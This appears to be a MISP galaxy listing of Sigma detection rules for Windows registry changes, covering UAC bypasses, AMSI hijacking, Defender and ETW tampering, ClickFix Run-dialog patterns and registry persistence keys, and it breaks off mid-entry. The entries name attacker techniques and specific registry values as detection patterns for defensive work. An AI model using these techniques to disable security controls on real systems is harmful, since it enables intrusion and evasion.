author Nasreddine Bencherchali (Nextron Systems), Omar Khaled (@beacon_exe)
creation_date 2023-12-05
falsepositive ['Legitimate usage of this key would also trigger this. Investigate the driver being added and make sure its intended']
filename registry_set_hvci_disallowed_images.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion']

Uncommon Microsoft Office Trusted Location Added

Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.

Internal MISP references

UUID f742bde7-9528-42e5-bd82-84f51a8387d2 which can be used as unique global reference for Uncommon Microsoft Office Trusted Location Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-06-21
falsepositive ['Other unknown legitimate or custom paths need to be filtered to avoid false positives']
filename registry_set_office_trusted_location_uncommon.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Modify User Shell Folders Startup Value

Detect modification of the startup key to a path where a payload could be stored to be launched during startup

Internal MISP references

UUID 9c226817-8dc9-46c2-a58d-66655aafd7dc which can be used as unique global reference for Modify User Shell Folders Startup Value in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-10-01
falsepositive ['Unknown']
filename registry_set_susp_user_shell_folders.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Disable Administrative Share Creation at Startup

Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system

Internal MISP references

UUID c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e which can be used as unique global reference for Disable Administrative Share Creation at Startup in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-16
falsepositive ['Unknown']
filename registry_set_disable_administrative_share.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1070.005']
Related clusters

To see the related clusters, click here.

MaxMpxCt Registry Value Changed

Detects changes to the "MaxMpxCt" registry value. MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate. Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.

Internal MISP references

UUID 0e6a9e62-627e-496c-aef5-bfa39da29b5e which can be used as unique global reference for MaxMpxCt Registry Value Changed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024-03-19
falsepositive ['Unknown']
filename registry_set_optimize_file_sharing_network.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1070.005']
Related clusters

To see the related clusters, click here.

New ODBC Driver Registered

Detects the registration of a new ODBC driver.

Internal MISP references

UUID 3390fbef-c98d-4bdd-a863-d65ed7c610dd which can be used as unique global reference for New ODBC Driver Registered in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-23
falsepositive ['Likely']
filename registry_set_odbc_driver_registered.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Wow6432Node Classes Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID 18f2065c-d36c-464a-a748-bcf909acb2e3 which can be used as unique global reference for Wow6432Node Classes Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019-10-25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_wow6432node_classes.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Uncommon Extension In Keyboard Layout IME File Registry Value

Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.

Internal MISP references

UUID b888e3f2-224d-4435-b00b-9dd66e9ea1f1 which can be used as unique global reference for Uncommon Extension In Keyboard Layout IME File Registry Value in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023-11-21
falsepositive ['IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.']
filename registry_set_ime_non_default_extension.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Persistence Via New SIP Provider

Detects when an attacker register a new SIP provider for persistence and defense evasion

Internal MISP references

UUID 5a2b21ee-6aaa-4234-ac9d-59a59edf90a1 which can be used as unique global reference for Persistence Via New SIP Provider in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-21
falsepositive ['Legitimate SIP being registered by the OS or different software.']
filename registry_set_sip_persistence.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1553.003']
Related clusters

To see the related clusters, click here.

Potential Persistence Via AutodialDLL

Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library

Internal MISP references

UUID e6fe26ee-d063-4f5b-b007-39e90aaf50e3 which can be used as unique global reference for Potential Persistence Via AutodialDLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-10
falsepositive ['Unlikely']
filename registry_set_persistence_autodial_dll.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Custom File Open Handler Executes PowerShell

Detects the abuse of custom file open handler, executing powershell

Internal MISP references

UUID 7530b96f-ad8e-431d-a04d-ac85cc461fdc which can be used as unique global reference for Custom File Open Handler Executes PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author CD_R0M_
creation_date 2022-06-11
falsepositive ['Unknown']
filename registry_set_custom_file_open_handler_powershell_execution.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

ClickOnce Trust Prompt Tampering

Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.

Internal MISP references

UUID ac9159cc-c364-4304-8f0a-d63fc1a0aabb which can be used as unique global reference for ClickOnce Trust Prompt Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SerkinValery, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-06-12
falsepositive ['Legitimate internal requirements.']
filename registry_set_clickonce_trust_prompt.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Windows Recall Feature Enabled - Registry

Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0". Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.

Internal MISP references

UUID 75180c5f-4ea1-461a-a4f6-6e4700c065d4 which can be used as unique global reference for Windows Recall Feature Enabled - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sajid Nawaz Khan
creation_date 2024-06-02
falsepositive ['Legitimate use/activation of Windows Recall']
filename registry_set_enable_windows_recall.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.collection', 'attack.t1113']
Related clusters

To see the related clusters, click here.

COM Hijack via Sdclt

Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'

Internal MISP references

UUID 07743f65-7ec9-404a-a519-913db7118a8d which can be used as unique global reference for COM Hijack via Sdclt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Omkar Gudhate
creation_date 2020-09-27
falsepositive ['Unknown']
filename registry_set_comhijack_sdclt.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1546', 'attack.t1548']
Related clusters

To see the related clusters, click here.

Service Binary in Suspicious Folder

Detect the creation of a service with a service binary located in a suspicious directory

Internal MISP references

UUID a07f0359-4c90-4dc4-a681-8ffea40b4f47 which can be used as unique global reference for Service Binary in Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), frack113
creation_date 2022-05-02
falsepositive ['Unknown']
filename registry_set_creation_service_susp_folder.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Suspicious Printer Driver Empty Manufacturer

Detects a suspicious printer driver installation with an empty Manufacturer value

Internal MISP references

UUID e0813366-0407-449a-9869-a2db1119dc41 which can be used as unique global reference for Suspicious Printer Driver Empty Manufacturer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020-07-01
falsepositive ['Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value']
filename registry_set_susp_printer_driver.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1574', 'cve.2021-1675']
Related clusters

To see the related clusters, click here.

Potential PowerShell Execution Policy Tampering

Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution

Internal MISP references

UUID fad91067-08c5-4d1a-8d8c-d96a21b37814 which can be used as unique global reference for Potential PowerShell Execution Policy Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-01-11
falsepositive ['Unknown']
filename registry_set_powershell_execution_policy.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion']

UAC Bypass via Sdclt

Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)

Internal MISP references

UUID 5b872a46-3b90-45c1-8419-f675db8053aa which can be used as unique global reference for UAC Bypass via Sdclt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Omer Yampel, Christian Burkard (Nextron Systems)
creation_date 2017-03-17
falsepositive ['Unknown']
filename registry_set_uac_bypass_sdclt.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002', 'car.2019-04-001']
Related clusters

To see the related clusters, click here.

New RUN Key Pointing to Suspicious Folder

Detects suspicious new RUN key element pointing to an executable in a suspicious folder

Internal MISP references

UUID 02ee49e2-e294-4d0f-9278-f5b3212fc588 which can be used as unique global reference for New RUN Key Pointing to Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing, Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2018-08-25
falsepositive ['Software using weird folders for updates']
filename registry_set_susp_run_key_img_folder.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Potential AMSI COM Server Hijacking

Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless

Internal MISP references

UUID 160d2780-31f7-4922-8b3a-efce30e63e96 which can be used as unique global reference for Potential AMSI COM Server Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-01-04
falsepositive ['Unknown']
filename registry_set_amsi_com_hijack.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Defender Exclusions Added - Registry

Detects the Setting of Windows Defender Exclusions

Internal MISP references

UUID a982fc9c-6333-4ffb-a51d-addb04e8b529 which can be used as unique global reference for Windows Defender Exclusions Added - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-07-06
falsepositive ['Administrator actions']
filename registry_set_defender_exclusions.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Outlook Home Page

Detects potential persistence activity via outlook home page. An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.

Internal MISP references

UUID ddd171b5-2cc6-4975-9e78-f0eccd08cc76 which can be used as unique global reference for Potential Persistence Via Outlook Home Page in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand
creation_date 2021-06-09
falsepositive ['Unknown']
filename registry_set_persistence_outlook_homepage.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.persistence', 'attack.t1112']
Related clusters

To see the related clusters, click here.

ETW Logging Disabled For rpcrt4.dll

Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll

Internal MISP references

UUID 90f342e1-1aaa-4e43-b092-39fda57ed11e which can be used as unique global reference for ETW Logging Disabled For rpcrt4.dll in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-12-09
falsepositive ['Unknown']
filename registry_set_rpcrt4_etw_tamper.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112', 'attack.t1562']
Related clusters

To see the related clusters, click here.

UAC Bypass Using Windows Media Player - Registry

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

Internal MISP references

UUID 5f9db380-ea57-4d1e-beab-8a2d33397e93 which can be used as unique global reference for UAC Bypass Using Windows Media Player - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-08-23
falsepositive ['Unknown']
filename registry_set_uac_bypass_wmp.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Potential Persistence Using DebugPath

Detects potential persistence using Appx DebugPath

Internal MISP references

UUID df4dc653-1029-47ba-8231-3c44238cc0ae which can be used as unique global reference for Potential Persistence Using DebugPath in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-07-27
falsepositive ['Unknown']
filename registry_set_persistence_appx_debugger.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.015']
Related clusters

To see the related clusters, click here.

Windows Defender Service Disabled - Registry

Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry

Internal MISP references

UUID e1aa95de-610a-427d-b9e7-9b46cfafbe6a which can be used as unique global reference for Windows Defender Service Disabled - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali
creation_date 2022-08-01
falsepositive ['Administrator actions']
filename registry_set_disable_windows_defender_service.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

PowerShell Script Execution Policy Enabled

Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.

Internal MISP references

UUID 8218c875-90b9-42e2-b60d-0b0069816d10 which can be used as unique global reference for PowerShell Script Execution Policy Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Thurein Oo
creation_date 2023-10-18
falsepositive ['Likely']
filename registry_set_powershell_enablescripts_enabled.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.execution']

UAC Notification Disabled

Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. When "UACDisableNotify" is set to 1, UAC prompts are suppressed.

Internal MISP references

UUID c5f6a85d-b647-40f7-bbad-c10b66bab038 which can be used as unique global reference for UAC Notification Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2024-05-10
falsepositive ['Unknown']
filename registry_set_uac_disable_notification.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Add DisallowRun Execution to Registry

Detect set DisallowRun to 1 to prevent user running specific computer program

Internal MISP references

UUID 275641a5-a492-45e2-a817-7c81e9d9d3e9 which can be used as unique global reference for Add DisallowRun Execution to Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-08-19
falsepositive ['Unknown']
filename registry_set_disallowrun_execution.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Disable Macro Runtime Scan Scope

Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros

Internal MISP references

UUID ab871450-37dc-4a3a-997f-6662aa8ae0f1 which can be used as unique global reference for Disable Macro Runtime Scan Scope in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-10-25
falsepositive ['Unknown']
filename registry_set_disable_macroruntimescanscope.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion']

Potential ClickFix Execution Pattern - Registry

Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links. ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages. Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content, such as one-liners that execute remotely hosted malicious files or scripts.

Internal MISP references

UUID f5fe36cf-f1ec-4c23-903d-09a3110f6bbb which can be used as unique global reference for Potential ClickFix Execution Pattern - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-03-25
falsepositive ['Legitimate applications using RunMRU with HTTP links']
filename registry_set_potential_clickfix_execution.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.execution', 'attack.t1204.001']
Related clusters

To see the related clusters, click here.

Registry Hide Function from User

Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)

Internal MISP references

UUID 5a93eb65-dffa-4543-b761-94aa60098fb6 which can be used as unique global reference for Registry Hide Function from User in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-03-18
falsepositive ['Legitimate admin script']
filename registry_set_hide_function_user.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Outlook EnableUnsafeClientMailRules Setting Enabled - Registry

Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros

Internal MISP references

UUID 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 which can be used as unique global reference for Outlook EnableUnsafeClientMailRules Setting Enabled - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-08
falsepositive ['Unknown']
filename registry_set_office_outlook_enable_unsafe_client_mail_rules.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential Persistence Via TypedPaths

Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt

Internal MISP references

UUID 086ae989-9ca6-4fe7-895a-759c5544f247 which can be used as unique global reference for Potential Persistence Via TypedPaths in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-22
falsepositive ['Unlikely']
filename registry_set_persistence_typed_paths.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Potentially Suspicious Command Executed Via Run Dialog Box - Registry

Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.

Internal MISP references

UUID a7df0e9e-91a5-459a-a003-4cde67c2ff5d which can be used as unique global reference for Potentially Suspicious Command Executed Via Run Dialog Box - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ahmed Farouk, Nasreddine Bencherchali
creation_date 2024-11-01
falsepositive ['Unknown']
filename registry_set_runmru_susp_command_execution.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

PowerShell as a Service in Registry

Detects that a powershell code is written to the registry as a service.

Internal MISP references

UUID 4a5f5a5e-ac01-474b-9b4e-d61298c9df1d which can be used as unique global reference for PowerShell as a Service in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Natalia Shornikova
creation_date 2020-10-06
falsepositive ['Unknown']
filename registry_set_powershell_as_service.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Usage of Renamed Sysinternals Tools - RegistrySet

Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution

Internal MISP references

UUID 8023f872-3f1d-4301-a384-801889917ab4 which can be used as unique global reference for Usage of Renamed Sysinternals Tools - RegistrySet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-24
falsepositive ['Unlikely']
filename registry_set_renamed_sysinternals_eula_accepted.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.resource-development', 'attack.t1588.002']
Related clusters

To see the related clusters, click here.

IE Change Domain Zone

Hides the file extension through modification of the registry

Internal MISP references

UUID 45e112d0-7759-4c2a-aa36-9f8fb79d3393 which can be used as unique global reference for IE Change Domain Zone in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-22
falsepositive ['Administrative scripts']
filename registry_set_change_security_zones.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1137']
Related clusters

To see the related clusters, click here.

Tamper With Sophos AV Registry Keys

Detects tamper attempts to sophos av functionality via registry key modification

Internal MISP references

UUID 9f4662ac-17ca-43aa-8f12-5d7b989d0101 which can be used as unique global reference for Tamper With Sophos AV Registry Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-09-02
falsepositive ['Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate']
filename registry_set_sophos_av_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Disable Windows Event Logging Via Registry

Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel

Internal MISP references

UUID 2f78da12-f7c7-430b-8b19-a28f269b77a3 which can be used as unique global reference for Disable Windows Event Logging Via Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-04
falsepositive ['Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting']
filename registry_set_disable_winevt_logging.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Potential WerFault ReflectDebugger Registry Value Abuse

Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.

Internal MISP references

UUID 0cf2e1c6-8d10-4273-8059-738778f981ad which can be used as unique global reference for Potential WerFault ReflectDebugger Registry Value Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior
creation_date 2023-05-18
falsepositive ['Unknown']
filename registry_set_persistence_reflectdebugger.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Winlogon AllowMultipleTSSessions Enable

Detects when the 'AllowMultipleTSSessions' value is enabled. Which allows for multiple Remote Desktop connection sessions to be opened at once. This is often used by attacker as a way to connect to an RDP session without disconnecting the other users

Internal MISP references

UUID f7997770-92c3-4ec9-b112-774c4ef96f96 which can be used as unique global reference for Winlogon AllowMultipleTSSessions Enable in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-09-09
falsepositive ['Legitimate use of the multi session functionality']
filename registry_set_winlogon_allow_multiple_tssessions.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Registry Persistence via Service in Safe Mode

Detects the modification of the registry to allow a driver or service to persist in Safe Mode.

Internal MISP references

UUID 1547e27c-3974-43e2-a7d7-7f484fb928ec which can be used as unique global reference for Registry Persistence via Service in Safe Mode in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-04-04
falsepositive ['Unknown']
filename registry_set_add_load_service_in_safe_mode.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1564.001']
Related clusters

To see the related clusters, click here.

ScreenSaver Registry Key Set

Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl

Internal MISP references

UUID 40b6e656-4e11-4c0c-8772-c1cc6dae34ce which can be used as unique global reference for ScreenSaver Registry Key Set in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
creation_date 2022-05-04
falsepositive ['Legitimate use of screen saver']
filename registry_set_scr_file_executed_by_rundll32.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

ETW Logging Disabled For SCM

Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)

Internal MISP references

UUID 4f281b83-0200-4b34-bf35-d24687ea57c2 which can be used as unique global reference for ETW Logging Disabled For SCM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-12-09
falsepositive ['Unknown']
filename registry_set_services_etw_tamper.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Potential Signing Bypass Via Windows Developer Features - Registry

Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.

Internal MISP references

UUID b110ebaf-697f-4da1-afd5-b536fa27a2c1 which can be used as unique global reference for Potential Signing Bypass Via Windows Developer Features - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-01-12
falsepositive ['Unknown']
filename registry_set_turn_on_dev_features.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion']

Disable Internal Tools or Feature in Registry

Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)

Internal MISP references

UUID e2482f8d-3443-4237-b906-cc145d87a076 which can be used as unique global reference for Disable Internal Tools or Feature in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec
creation_date 2022-03-18
falsepositive ['Legitimate admin script']
filename registry_set_disable_function_user.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

UAC Bypass Abusing Winsat Path Parsing - Registry

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

Internal MISP references

UUID 6597be7b-ac61-4ac8-bef4-d3ec88174853 which can be used as unique global reference for UAC Bypass Abusing Winsat Path Parsing - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-08-30
falsepositive ['Unknown']
filename registry_set_uac_bypass_winsat.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Disable Windows Security Center Notifications

Detect set UseActionCenterExperience to 0 to disable the Windows security center notification

Internal MISP references

